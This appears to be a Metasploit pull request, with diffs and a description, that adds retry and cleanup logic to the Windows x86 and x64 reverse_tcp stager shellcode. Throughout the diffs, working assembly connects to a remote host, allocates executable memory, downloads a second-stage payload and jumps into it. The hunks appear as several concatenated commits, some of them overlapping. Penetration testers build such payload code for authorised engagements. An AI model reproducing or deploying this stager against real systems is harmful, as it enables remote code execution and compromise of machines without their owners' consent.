### PR TITLE
Stager resiliency for reverse_tcp (Windows x64 and x86)

### DIFF
--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -194,7 +194,7 @@ module Payload::Windows::ReverseTcp
         ; reliability: check to see if the recv worked, and reconnect
         ; if it fails
         cmp eax, 0
-        jle handle_connect_failure
+        jle cleanup_socket
       ^
     end
 
@@ -235,6 +235,7 @@ module Payload::Windows::ReverseTcp
         push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
         call ebp                ; VirtualFree(payload, 0, MEM_DECOMMIT)
 
+      cleanup_socket:
         ; clear up the socket
         push edi                ; socket handle
         push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}

--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -80,7 +80,7 @@ module Payload::Windows::ReverseTcp
     space += 8
 
     # Reliability adds some bytes!
-    space += 41
+    space += 44
 
     space += uuid_required_size if include_send_uuid
 
@@ -153,21 +153,21 @@ module Payload::Windows::ReverseTcp
 
       handle_connect_failure:
         ; decrement our attempt count and try again
-        dec dword [esi+8]
+        dec [esi+8]
         jnz try_connect
     ^
 
     if opts[:exitfunk]
       asm << %Q^
-        failure:
-          call exitfunk
-        ^
+      failure:
+        call exitfunk
+      ^
     else
       asm << %Q^
-        failure:
-          push 0x56A2B5F0       ; hardcoded to exitprocess for size
-          call ebp
-        ^
+      failure:
+        push 0x56A2B5F0         ; hardcoded to exitprocess for size
+        call ebp
+      ^
     end
 
     asm << %Q^
@@ -243,6 +243,7 @@ module Payload::Windows::ReverseTcp
         ; restore the stack back to the connection retry count
         pop esi
         pop esi
+        dec [esp]               ; decrement the counter
 
         ; try again
         jmp create_socket

--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -76,8 +76,8 @@ module Payload::Windows::ReverseTcp
     # Start with our cached default generated size
     space = cached_size
 
-    # EXITFUNK processing only seems to add 8 bytes on top of the default
-    space += 8
+    # EXITFUNK 'thread' is the biggest by far, adds 29 bytes.
+    space += 29
 
     # Reliability adds some bytes!
     space += 44

--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -76,11 +76,11 @@ module Payload::Windows::ReverseTcp
     # Start with our cached default generated size
     space = cached_size
 
-    # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
-    space += 31
+    # EXITFUNK processing only seems to add 8 bytes on top of the default
+    space += 8
 
-    # Reliability adds 10 bytes for recv error checks
-    space += 10
+    # Reliability adds some bytes!
+    space += 41
 
     space += uuid_required_size if include_send_uuid
 
@@ -108,49 +108,51 @@ module Payload::Windows::ReverseTcp
       ; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
 
       reverse_tcp:
-        push 0x00003233        ; Push the bytes 'ws2_32',0,0 onto the stack.
-        push 0x5F327377        ; ...
-        push esp               ; Push a pointer to the "ws2_32" string on the stack.
-        push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
-        call ebp               ; LoadLibraryA( "ws2_32" )
+        push '32'               ; Push the bytes 'ws2_32',0,0 onto the stack.
+        push 'ws2_'             ; ...
+        push esp                ; Push a pointer to the "ws2_32" string on the stack.
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        call ebp                ; LoadLibraryA( "ws2_32" )
 
-        mov eax, 0x0190        ; EAX = sizeof( struct WSAData )
-        sub esp, eax           ; alloc some space for the WSAData structure
-        push esp               ; push a pointer to this stuct
-        push eax               ; push the wVersionRequested parameter
-        push 0x006B8029        ; hash( "ws2_32.dll", "WSAStartup" )
-        call ebp               ; WSAStartup( 0x0190, &WSAData );
-
-      create_socket:
-        push eax               ; if we succeed, eax will be zero, push zero for the flags param.
-        push eax               ; push null for reserved parameter
-        push eax               ; we do not specify a WSAPROTOCOL_INFO structure
-        push eax               ; we do not specify a protocol
-        inc eax                ;
-        push eax               ; push SOCK_STREAM
-        inc eax                ;
-        push eax               ; push AF_INET
-        push 0xE0DF0FEA        ; hash( "ws2_32.dll", "WSASocketA" )
-        call ebp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
-        xchg edi, eax          ; save the socket for later, don't care about the value of eax after this
+        mov eax, 0x0190         ; EAX = sizeof( struct WSAData )
+        sub esp, eax            ; alloc some space for the WSAData structure
+        push esp                ; push a pointer to this stuct
+        push eax                ; push the wVersionRequested parameter
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+        call ebp                ; WSAStartup( 0x0190, &WSAData );
 
       set_address:
-        push #{retry_count}    ; retry counter
-        push #{encoded_host}   ; host in little-endian format
-        push #{encoded_port}   ; family AF_INET and port number
-        mov esi, esp           ; save pointer to sockaddr struct
+        push #{retry_count}     ; retry counter
+
+      create_socket:
+        push #{encoded_host}    ; host in little-endian format
+        push #{encoded_port}    ; family AF_INET and port number
+        mov esi, esp            ; save pointer to sockaddr struct
+
+        push eax                ; if we succeed, eax will be zero, push zero for the flags param.
+        push eax                ; push null for reserved parameter
+        push eax                ; we do not specify a WSAPROTOCOL_INFO structure
+        push eax                ; we do not specify a protocol
+        inc eax                 ;
+        push eax                ; push SOCK_STREAM
+        inc eax                 ;
+        push eax                ; push AF_INET
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+        call ebp                ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
+        xchg edi, eax           ; save the socket for later, don't care about the value of eax after this
 
       try_connect:
-        push 16                ; length of the sockaddr struct
-        push esi               ; pointer to the sockaddr struct
-        push edi               ; the socket
-        push 0x6174A599        ; hash( "ws2_32.dll", "connect" )
-        call ebp               ; connect( s, &sockaddr, 16 );
+        push 16                 ; length of the sockaddr struct
+        push esi                ; pointer to the sockaddr struct
+        push edi                ; the socket
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
+        call ebp                ; connect( s, &sockaddr, 16 );
 
-        test eax,eax           ; non-zero means a failure
+        test eax,eax            ; non-zero means a failure
         jz connected
 
-      handle_failure:
+      handle_connect_failure:
+        ; decrement our attempt count and try again
         dec dword [esi+8]
         jnz try_connect
     ^
@@ -163,82 +165,96 @@ module Payload::Windows::ReverseTcp
     else
       asm << %Q^
         failure:
-          push 0x56A2B5F0        ; hardcoded to exitprocess for size
+          push 0x56A2B5F0       ; hardcoded to exitprocess for size
           call ebp
         ^
     end
-    # TODO: Rewind the stack, free memory, try again
-=begin
-      if opts[:reliable]
-        asm << %Q^
-           reconnect:
-
-          ^
-      end
-=end
 
     asm << %Q^
+      ; this  lable is required so that reconnect attempts include
+      ; the UUID stuff if required.
       connected:
-      ^
+    ^
 
     asm << asm_send_uuid if include_send_uuid
 
     asm << %Q^
       recv:
         ; Receive the size of the incoming second stage...
-        push 0                 ; flags
-        push 4                 ; length = sizeof( DWORD );
-        push esi               ; the 4 byte buffer on the stack to hold the second stage length
-        push edi               ; the saved socket
-        push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
-        call ebp               ; recv( s, &dwLength, 4, 0 );
+        push 0                  ; flags
+        push 4                  ; length = sizeof( DWORD );
+        push esi                ; the 4 byte buffer on the stack to hold the second stage length
+        push edi                ; the saved socket
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        call ebp                ; recv( s, &dwLength, 4, 0 );
     ^
 
-    # Check for a failed recv() call
-    # TODO: Try again by jmping to reconnect
     if reliable
       asm << %Q^
-          cmp eax, 0
-          jle failure
-        ^
-    end
-
-    asm << %Q^
-        ; Alloc a RWX buffer for the second stage
-        mov esi, [esi]         ; dereference the pointer to the second stage length
-        push 0x40              ; PAGE_EXECUTE_READWRITE
-        push 0x1000            ; MEM_COMMIT
-        push esi               ; push the newly recieved second stage length.
-        push 0                 ; NULL as we dont care where the allocation is.
-        push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
-        call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
-        ; Receive the second stage and execute it...
-        xchg ebx, eax          ; ebx = our new memory address for the new stage
-        push ebx               ; push the address of the new stage so we can return into it
-
-      read_more:               ;
-        push 0                 ; flags
-        push esi               ; length
-        push ebx               ; the current address into our second stage's RWX buffer
-        push edi               ; the saved socket
-        push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
-        call ebp               ; recv( s, buffer, length, 0 );
-    ^
-
-    # Check for a failed recv() call
-    # TODO: Try again by jmping to reconnect
-    if reliable
-      asm << %Q^
+        ; reliability: check to see if the recv worked, and reconnect
+        ; if it fails
         cmp eax, 0
-        jle failure
+        jle handle_connect_failure
       ^
     end
 
     asm << %Q^
-        add ebx, eax           ; buffer += bytes_received
-        sub esi, eax           ; length -= bytes_received, will set flags
-        jnz read_more          ; continue if we have more to read
-        ret                    ; return into the second stage
+        ; Alloc a RWX buffer for the second stage
+        mov esi, [esi]          ; dereference the pointer to the second stage length
+        push 0x40               ; PAGE_EXECUTE_READWRITE
+        push 0x1000             ; MEM_COMMIT
+        push esi                ; push the newly recieved second stage length.
+        push 0                  ; NULL as we dont care where the allocation is.
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        call ebp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+        ; Receive the second stage and execute it...
+        xchg ebx, eax           ; ebx = our new memory address for the new stage
+        push ebx                ; push the address of the new stage so we can return into it
+
+      read_more:
+        push 0                  ; flags
+        push esi                ; length
+        push ebx                ; the current address into our second stage's RWX buffer
+        push edi                ; the saved socket
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        call ebp                ; recv( s, buffer, length, 0 );
+    ^
+
+    if reliable
+      asm << %Q^
+        ; reliability: check to see if the recv worked, and reconnect
+        ; if it fails
+        cmp eax, 0
+        jge read_successful
+
+        ; something failed, free up memory
+        pop eax                 ; get the address of the payload
+        push 0x4000             ; dwFreeType (MEM_DECOMMIT)
+        push 0                  ; dwSize
+        push eax                ; lpAddress
+        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
+        call ebp                ; VirtualFree(payload, 0, MEM_DECOMMIT)
+
+        ; clear up the socket
+        push edi                ; socket handle
+        push #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
+        call ebp                ; closesocket(socket)
+
+        ; restore the stack back to the connection retry count
+        pop esi
+        pop esi
+
+        ; try again
+        jmp create_socket
+      ^
+    end
+
+    asm << %Q^
+      read_successful:
+        add ebx, eax            ; buffer += bytes_received
+        sub esi, eax            ; length -= bytes_received, will set flags
+        jnz read_more           ; continue if we have more to read
+        ret                     ; return into the second stage
     ^
 
     if opts[:exitfunk]

--- a/lib/msf/core/payload/windows/x64/exitfunk.rb
+++ b/lib/msf/core/payload/windows/x64/exitfunk.rb
@@ -33,25 +33,11 @@ module Payload::Windows::Exitfunk_x64
         ret                   ; Return to NULL (crash)
       ^
 
-    # On Windows Vista, Server 2008, and newer, it is not possible to call ExitThread
-    # on WoW64 processes, instead we need to call RtlExitUserThread. This stub will
-    # automatically generate the right code depending on the selected exit method.
-
     when 'thread'
       asm << %Q^
-        mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)}
-        mov r10d, 0x9DBD95A6  ; hash( "kernel32.dll", "GetVersion" )
-        call rbp              ; GetVersion(); (AL will = major version and AH will = minor version)
-        add rsp, 40           ; cleanup the default param space on stack
-        cmp al, 6             ; If we are not running on Windows Vista, 2008 or 7
-        jl exitfunk_goodbye   ; Then just call the exit function...
-        cmp bl, 0xE0          ; If we are trying a call to kernel32.dll!ExitThread on
-                              ; Windows Vista, 2008 or 7...
-        jne exitfunk_goodbye  ;
-        mov ebx, 0x6F721347   ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
-      exitfunk_goodbye:       ; We now perform the actual call to the exit function
         push 0                ;
         pop rcx               ; set the exit function parameter
+        mov ebx, 0x#{Msf::Payload::Windows.exit_types['thread'].to_s(16)}
         mov r10d, ebx         ; place the correct EXITFUNK into r10d
         call rbp              ; call EXITFUNK( 0 );
       ^

--- a/lib/msf/core/payload/windows/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp.rb
@@ -219,6 +219,7 @@ module Payload::Windows::ReverseTcp_x64
 
       ; Alloc a RWX buffer for the second stage
         pop rsi                 ; pop off the second stage length
+        movsxd rsi, esi         ; only use the lower-order 32 bits for the size
         push 0x40               ; 
         pop r9                  ; PAGE_EXECUTE_READWRITE
         push 0x1000             ; 

--- a/lib/msf/core/payload/windows/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp.rb
@@ -84,8 +84,8 @@ module Payload::Windows::ReverseTcp_x64
     # Start with our cached default generated size
     space = cached_size
 
-    # EXITFUNK processing adds some bytes onto the defaults
-    space += 11
+    # EXITFUNK 'seh' is the worst case, that adds 15 bytes
+    space += 15
 
     # Reliability adds bytes!
     space += 57

--- a/lib/msf/core/payload/windows/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp.rb
@@ -62,12 +62,12 @@ module Payload::Windows::ReverseTcp_x64
   #
   def generate_reverse_tcp(opts={})
     combined_asm = %Q^
-      cld                    ; Clear the direction flag.
-      and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned 
-      call start             ; Call start, this pushes the address of 'api_call' onto the stack.
+      cld                     ; Clear the direction flag.
+      and rsp, ~0xF           ;  Ensure RSP is 16 byte aligned 
+      call start              ; Call start, this pushes the address of 'api_call' onto the stack.
       #{asm_block_api}
       start:
-        pop rbp
+        pop rbp               ; block API pointer
       #{asm_reverse_tcp(opts)}
     ^
     Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string
@@ -84,11 +84,11 @@ module Payload::Windows::ReverseTcp_x64
     # Start with our cached default generated size
     space = cached_size
 
-    # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
-    space += 31
+    # EXITFUNK processing adds some bytes onto the defaults
+    space += 11
 
-    # Reliability adds 10 bytes for recv error checks
-    space += 10
+    # Reliability adds bytes!
+    space += 57
 
     space += uuid_required_size if include_send_uuid
 
@@ -105,7 +105,6 @@ module Payload::Windows::ReverseTcp_x64
   #
   def asm_reverse_tcp(opts={})
 
-    # TODO: reliability coming later
     reliable     = opts[:reliable]
     retry_count  = [opts[:retry_count].to_i, 1].max
     encoded_port = [opts[:port].to_i,2].pack("vn").unpack("N").first
@@ -114,88 +113,173 @@ module Payload::Windows::ReverseTcp_x64
 
     asm = %Q^
       reverse_tcp:
-        ; setup the structures we need on the stack...
+      ; setup the structures we need on the stack...
         mov r14, 'ws2_32'
-        push r14               ; Push the bytes 'ws2_32',0,0 onto the stack.
-        mov r14, rsp           ; save pointer to the "ws2_32" string for LoadLibraryA call.
-        sub rsp, #{408+8}      ; alloc sizeof( struct WSAData ) bytes for the WSAData
-                               ; structure (+8 for alignment)
-        mov r13, rsp           ; save pointer to the WSAData structure for WSAStartup call.
+        push r14                ; Push the bytes 'ws2_32',0,0 onto the stack.
+        mov r14, rsp            ; save pointer to the "ws2_32" string for LoadLibraryA call.
+        sub rsp, #{408+8}       ; alloc sizeof( struct WSAData ) bytes for the WSAData
+                                ; structure (+8 for alignment)
+        mov r13, rsp            ; save pointer to the WSAData structure for WSAStartup call.
         mov r12, #{encoded_host_port}
-        push r12               ; host, family AF_INET and port
-        mov r12, rsp           ; save pointer to sockaddr struct for connect call
+        push r12                ; host, family AF_INET and port
+        mov r12, rsp            ; save pointer to sockaddr struct for connect call
+
       ; perform the call to LoadLibraryA...
-        mov rcx, r14           ; set the param for the library to load
-        mov r10d, 0x0726774C   ; hash( "kernel32.dll", "LoadLibraryA" )
-        call rbp               ; LoadLibraryA( "ws2_32" )
+        mov rcx, r14            ; set the param for the library to load
+        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
+        call rbp                ; LoadLibraryA( "ws2_32" )
+
       ; perform the call to WSAStartup...
-        mov rdx, r13           ; second param is a pointer to this stuct
-        push 0x0101            ;
-        pop rcx                ; set the param for the version requested
-        mov r10d, 0x006B8029   ; hash( "ws2_32.dll", "WSAStartup" )
-        call rbp               ; WSAStartup( 0x0101, &WSAData );
+        mov rdx, r13            ; second param is a pointer to this stuct
+        push 0x0101             ;
+        pop rcx                 ; set the param for the version requested
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
+        call rbp                ; WSAStartup( 0x0101, &WSAData );
+
+      ; stick the retry count on the stack and store it
+        push #{retry_count}     ; retry counter
+        pop r14
+
+      create_socket:
       ; perform the call to WSASocketA...
-        push rax               ; if we succeed, rax wil be zero, push zero for the flags param.
-        push rax               ; push null for reserved parameter
-        xor r9, r9             ; we do not specify a WSAPROTOCOL_INFO structure
-        xor r8, r8             ; we do not specify a protocol
-        inc rax                ;
-        mov rdx, rax           ; push SOCK_STREAM
-        inc rax                ;
-        mov rcx, rax           ; push AF_INET
-        mov r10d, 0xE0DF0FEA   ; hash( "ws2_32.dll", "WSASocketA" )
-        call rbp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
-        mov rdi, rax           ; save the socket for later
+        push rax                ; if we succeed, rax wil be zero, push zero for the flags param.
+        push rax                ; push null for reserved parameter
+        xor r9, r9              ; we do not specify a WSAPROTOCOL_INFO structure
+        xor r8, r8              ; we do not specify a protocol
+        inc rax                 ;
+        mov rdx, rax            ; push SOCK_STREAM
+        inc rax                 ;
+        mov rcx, rax            ; push AF_INET
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
+        call rbp                ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
+        mov rdi, rax            ; save the socket for later
+
+      try_connect:
       ; perform the call to connect...
-        push 16                ; length of the sockaddr struct
-        pop r8                 ; pop off the third param
-        mov rdx, r12           ; set second param to pointer to sockaddr struct
-        mov rcx, rdi           ; the socket
-        mov r10d, 0x6174A599   ; hash( "ws2_32.dll", "connect" )
-        call rbp               ; connect( s, &sockaddr, 16 );
-        ; restore RSP so we dont have any alignment issues with the next block...
-        add rsp, #{408+8+8*4+32*4} ; cleanup the stack allocations
+        push 16                 ; length of the sockaddr struct
+        pop r8                  ; pop off the third param
+        mov rdx, r12            ; set second param to pointer to sockaddr struct
+        mov rcx, rdi            ; the socket
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'connect')}
+        call rbp                ; connect( s, &sockaddr, 16 );
+
+        test eax, eax           ; non-zero means failure
+        jz connected
+
+      handle_connect_failure:
+        dec r14                 ; decrement the retry count
+        jnz try_connect
     ^
 
+    if opts[:exitfunk]
+      asm << %Q^
+      failure:
+        call exitfunk
+      ^
+    else
+      asm << %Q^
+      failure:
+        push 0x56A2B5F0       ; hardcoded to exitprocess for size
+        call rbp
+      ^
+    end
+
+    asm << %Q^
+      ; this  lable is required so that reconnect attempts include
+      ; the UUID stuff if required.
+      connected:
+    ^
     asm << asm_send_uuid if include_send_uuid
 
     asm << %Q^
       recv:
-        ; Receive the size of the incoming second stage...
-        sub rsp, 16            ; alloc some space (16 bytes) on stack for to hold the second stage length
-        mov rdx, rsp           ; set pointer to this buffer
-        xor r9, r9             ; flags
-        push 4                 ; 
-        pop r8                 ; length = sizeof( DWORD );
-        mov rcx, rdi           ; the saved socket
-        mov r10d, 0x5FC8D902   ; hash( "ws2_32.dll", "recv" )
-        call rbp               ; recv( s, &dwLength, 4, 0 );
-        add rsp, 32            ; we restore RSP from the api_call so we can pop off RSI next
-        ; Alloc a RWX buffer for the second stage
-        pop rsi                ; pop off the second stage length
-        push 0x40              ; 
-        pop r9                 ; PAGE_EXECUTE_READWRITE
-        push 0x1000            ; 
-        pop r8                 ; MEM_COMMIT
-        mov rdx, rsi           ; the newly recieved second stage length.
-        xor rcx, rcx           ; NULL as we dont care where the allocation is.
-        mov r10d, 0xE553A458   ; hash( "kernel32.dll", "VirtualAlloc" )
-        call rbp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+      ; Receive the size of the incoming second stage...
+        sub rsp, 16             ; alloc some space (16 bytes) on stack for to hold the
+                                ; second stage length
+        mov rdx, rsp            ; set pointer to this buffer
+        xor r9, r9              ; flags
+        push 4                  ; 
+        pop r8                  ; length = sizeof( DWORD );
+        mov rcx, rdi            ; the saved socket
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        call rbp                ; recv( s, &dwLength, 4, 0 );
+    ^
+
+    if reliable
+      asm << %Q^
+      ; reliability: check to see if the recv worked, and reconnect
+      ; if it fails
+        cmp eax, 0
+        jle handle_connect_failure
+      ^
+    end
+
+    asm << %Q^
+        add rsp, 32             ; we restore RSP from the api_call so we can pop off RSI next
+
+      ; Alloc a RWX buffer for the second stage
+        pop rsi                 ; pop off the second stage length
+        push 0x40               ; 
+        pop r9                  ; PAGE_EXECUTE_READWRITE
+        push 0x1000             ; 
+        pop r8                  ; MEM_COMMIT
+        mov rdx, rsi            ; the newly recieved second stage length.
+        xor rcx, rcx            ; NULL as we dont care where the allocation is.
+        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
+        call rbp                ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
         ; Receive the second stage and execute it...
-        mov rbx, rax           ; rbx = our new memory address for the new stage
-        mov r15, rax           ; save the address so we can jump into it later
-      read_more:               ;
-        xor r9, r9             ; flags
-        mov r8, rsi            ; length
-        mov rdx, rbx           ; the current address into our second stages RWX buffer
-        mov rcx, rdi           ; the saved socket
-        mov r10d, 0x5FC8D902   ; hash( "ws2_32.dll", "recv" )
-        call rbp               ; recv( s, buffer, length, 0 );
-        add rbx, rax           ; buffer += bytes_received
-        sub rsi, rax           ; length -= bytes_received
-        test rsi, rsi          ; test length
-        jnz read_more          ; continue if we have more to read
-        jmp r15                ; return into the second stage
+        mov rbx, rax            ; rbx = our new memory address for the new stage
+        mov r15, rax            ; save the address so we can jump into it later
+
+      read_more:                ;
+        xor r9, r9              ; flags
+        mov r8, rsi             ; length
+        mov rdx, rbx            ; the current address into our second stages RWX buffer
+        mov rcx, rdi            ; the saved socket
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
+        call rbp                ; recv( s, buffer, length, 0 );
+    ^
+
+    if reliable
+      asm << %Q^
+      ; reliability: check to see if the recv worked, and reconnect
+      ; if it fails
+        cmp eax, 0
+        jge read_successful
+
+      ; something failed so free up memory
+        pop rax
+        push r15
+        pop rcx                 ; lpAddress
+        push 0x4000             ; MEM_COMMIT
+        pop r8                  ; dwFreeType
+        push 0                  ; 0
+        pop rdx                 ; dwSize
+        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
+        call rbp                ; VirtualFree(payload, 0, MEM_COMMIT)
+
+      ; clean up the socket
+        push rdi                ; socket handle
+        pop rcx                 ; s (closesocket parameter)
+        mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
+        call rbp
+        ; rax is now conveniently set to zero
+        ; move rsp back to where the retry count is
+        add rsp, 0xD0
+
+      ; and try again
+        dec r14                 ; decrement the retry count
+        jmp create_socket
+      ^
+    end
+
+    asm << %Q^
+      read_successful:
+        add rbx, rax            ; buffer += bytes_received
+        sub rsi, rax            ; length -= bytes_received
+        test rsi, rsi           ; test length
+        jnz read_more           ; continue if we have more to read
+        jmp r15                 ; return into the second stage
     ^
 
     if opts[:exitfunk]

--- a/lib/msf/core/payload/windows/x64/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/x64/reverse_tcp.rb
@@ -210,7 +210,7 @@ module Payload::Windows::ReverseTcp_x64
       ; reliability: check to see if the recv worked, and reconnect
       ; if it fails
         cmp eax, 0
-        jle handle_connect_failure
+        jle cleanup_socket
       ^
     end
 
@@ -258,14 +258,12 @@ module Payload::Windows::ReverseTcp_x64
         mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
         call rbp                ; VirtualFree(payload, 0, MEM_COMMIT)
 
+      cleanup_socket:
       ; clean up the socket
         push rdi                ; socket handle
         pop rcx                 ; s (closesocket parameter)
         mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
         call rbp
-        ; rax is now conveniently set to zero
-        ; move rsp back to where the retry count is
-        add rsp, 0xD0
 
       ; and try again
         dec r14                 ; decrement the retry count

--- a/modules/payloads/stagers/windows/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/reverse_tcp'
 
 module Metasploit4
 
-  CachedSize = 447
+  CachedSize = 450
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseTcp_x64

--- a/modules/payloads/stagers/windows/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_tcp.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/reverse_tcp'
 
 module Metasploit4
 
-  CachedSize = 437
+  CachedSize = 447
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseTcp_x64

--- a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/reverse_tcp'
 
 module Metasploit4
 
-  CachedSize = 478
+  CachedSize = 488
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseTcp_x64

--- a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb
@@ -9,7 +9,7 @@ require 'msf/core/payload/windows/x64/reverse_tcp'
 
 module Metasploit4
 
-  CachedSize = 488
+  CachedSize = 491
 
   include Msf::Payload::Stager
   include Msf::Payload::Windows::ReverseTcp_x64


### PR DESCRIPTION
This PR contains changes that make the stagers more resilient to failure. If the stager isn't able to connect, or if download of the stage fails prior to invocation, then the stager should now correctly handle these cases. Stagers now clean up memory, close sockets and retry in the most appropriate way.

Adding resiliency features obviously adds size to the shellcode, and so this is only included when there is enough room in the target exploit/binary/etc.

This PR is only for x64 and x86 `reverse_tcp` in Windows, future PRs will cover other cases.
## Verification
- [x] `windows/meterpreter/reverse_tcp` payload functions as it did before.
- [ ] `windows/x64/meterpreter/reverse_tcp` payload functions as it did before.
- [x] `windows/meterpreter/reverse_tcp` is able to recover when the stage isn't successfully downloaded.
- [ ] `windows/x64/meterpreter/reverse_tcp` is able to recover when the stage isn't successfully downloaded.

Simulation of this is a bit of a pain in the butt, so I might ask if @bcook-r7 or @hmoore-r7 can handle this as they're across repro steps already. Thanks!
